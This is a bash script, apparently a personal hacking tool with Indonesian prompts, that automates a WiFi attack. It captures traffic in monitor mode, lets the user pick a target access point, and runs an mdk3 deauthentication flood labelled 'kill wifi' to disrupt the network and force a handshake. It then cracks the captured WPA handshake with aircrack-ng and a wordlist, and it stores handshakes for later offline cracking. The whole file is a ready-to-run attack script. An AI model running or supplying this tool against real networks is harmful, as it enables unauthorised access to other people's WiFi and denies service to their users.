#!/bin/bash

white="\033[1;37m"
grey="\033[0;37m"
purple="\033[0;35m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
Purple="\033[0;35m"
Cyan="\033[0;36m"
Cafe="\033[0;33m"
Fiuscha="\033[0;35m"
blue="\033[1;34m"
transparent="\e[0m"

DUMP_PATH="/home/shun/hack/tmp/brute/hand/"

function online {
 
   airmon-ng start wlp9s0
   mkdir /tmp/hacking

   xterm -bg "#000000" -fg "#FFFFFF" -title "wifi monitor..." -e airodump-ng mon0 -w /tmp/hacking/hand
   cat /tmp/hacking/hand-01.csv
 
   printf $red"masukan mac : "
   read mac
   printf $yellow"masukan chanel : "
   read chan

   echo ""
   printf $green"monitor chanel"

   xterm -bg "#000000" -fg "#00AA00" -title "chanel mon" -e airodump-ng -c $chan --bssid $mac -w /tmp/hacking/hand mon0 &
   xterm -bg "#000000" -fg "#FF00A4" -title "kill wifi" -e mdk3 mon0 d

   printf $yellow"lanjut ENTER "
   read

   xterm -bg "#000000" -fg "#00AA00" -title "serang!!!" -e aircrack-ng -w /home/shun/hack/wordlist4.txt -b $mac /tmp/hacking/hand-01.cap

   printf $Cyan"simpan handsake y/ENTER : "
   read save

   if [ "$save" = "y" ]; then

      if [ ! -d $DUMP_PATH ]; then
          mkdir -p $DUMP_PATH
      fi
  
      echo ""
      read -p "Nama handshake : " nama

      if [ ! -d $DUMP_PATH"$nama" ]; then
         mkdir $DUMP_PATH"$nama"
      fi
  
      cp /tmp/hacking/* $DUMP_PATH"$nama"
      printf $white"sukses menyimpan handsake\n\n"
   else
      rm /tmp/hacking/*
      echo $red"hapus handsake"
   fi

   airmon-ng stop mon0
}

function offline {
	ls $DUMP_PATH
	read -p "Nama handshake : " offnama
    xterm -bg "#000000" -fg "#00AA00" -title "serang!!!" -e aircrack-ng -w /home/shun/hack/wordlist4.txt $DUMP_PATH"$offnama"/hand-01.cap &
}

clear

read -p "offline/ENTER : " Main
if [ "$Main" = "offline" ]; then
    offline
else
    online
fi
